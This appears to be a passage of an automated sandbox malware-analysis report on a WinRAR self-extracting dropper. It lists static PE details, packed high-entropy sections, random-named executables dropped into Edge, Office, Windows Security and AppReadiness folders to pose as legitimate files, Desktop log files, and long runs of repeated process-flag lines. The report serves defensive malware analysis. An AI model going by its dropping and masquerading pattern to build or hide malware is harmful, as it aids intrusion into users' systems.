                                    Source: 8k1e14tjcx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 8k1e14tjcx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: 8k1e14tjcx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8k1e14tjcx.exe
                                    Source: 8k1e14tjcx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 8k1e14tjcx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 8k1e14tjcx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 8k1e14tjcx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 8k1e14tjcx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeFile created: C:\ChainagentComponent\__tmp_rar_sfx_access_check_4427890Jump to behavior
                                    Source: 8k1e14tjcx.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAF640 push ecx; ret 0_2_00EAF653
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAEB78 push eax; ret 0_2_00EAEB96
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9B7D00AD pushad ; iretd 4_2_00007FFD9B7D00C1
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9B932730 push eax; retf 0009h4_2_00007FFD9B932731
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9B932F30 push eax; retn 0009h4_2_00007FFD9B932F31
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9BBE6116 push eax; ret 4_2_00007FFD9BBE613D
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeCode function: 9_2_00007FFD9BB82F30 push eax; retn 0009h9_2_00007FFD9BB82F31
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeCode function: 9_2_00007FFD9BE36116 push eax; ret 9_2_00007FFD9BE3613D
                                    Source: ChainFontruntimeCrt.exe.0.drStatic PE information: section name: .text entropy: 7.5758361246531685
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe.4.drStatic PE information: section name: .text entropy: 7.5758361246531685
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe0.4.drStatic PE information: section name: .text entropy: 7.5758361246531685
                                    Source: OfficeClickToRun.exe.4.drStatic PE information: section name: .text entropy: 7.5758361246531685
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe1.4.drStatic PE information: section name: .text entropy: 7.5758361246531685
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe2.4.drStatic PE information: section name: .text entropy: 7.5758361246531685
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\phDaBATS.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\odxAFePx.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\ZXODDOCy.logJump to dropped file
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeFile created: C:\ChainagentComponent\ChainFontruntimeCrt.exeJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\hgJAcPUI.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\xHFppYee.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\otzSQnXU.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\MyEwMoxX.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\HZSnKfqJ.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\xWHHAgmB.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\PjjNTCHQ.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\QZsVJdpt.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\sUnrMbPq.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\GFbXjJsj.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\HqZFZAkM.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\xHFppYee.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\odxAFePx.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\HZSnKfqJ.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\sUnrMbPq.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\hgJAcPUI.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\QZsVJdpt.logJump to dropped file
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\HqZFZAkM.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\phDaBATS.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\ZXODDOCy.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\PjjNTCHQ.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\GFbXjJsj.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\xWHHAgmB.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\otzSQnXU.logJump to dropped file
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile created: C:\Users\user\Desktop\MyEwMoxX.logJump to dropped file
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
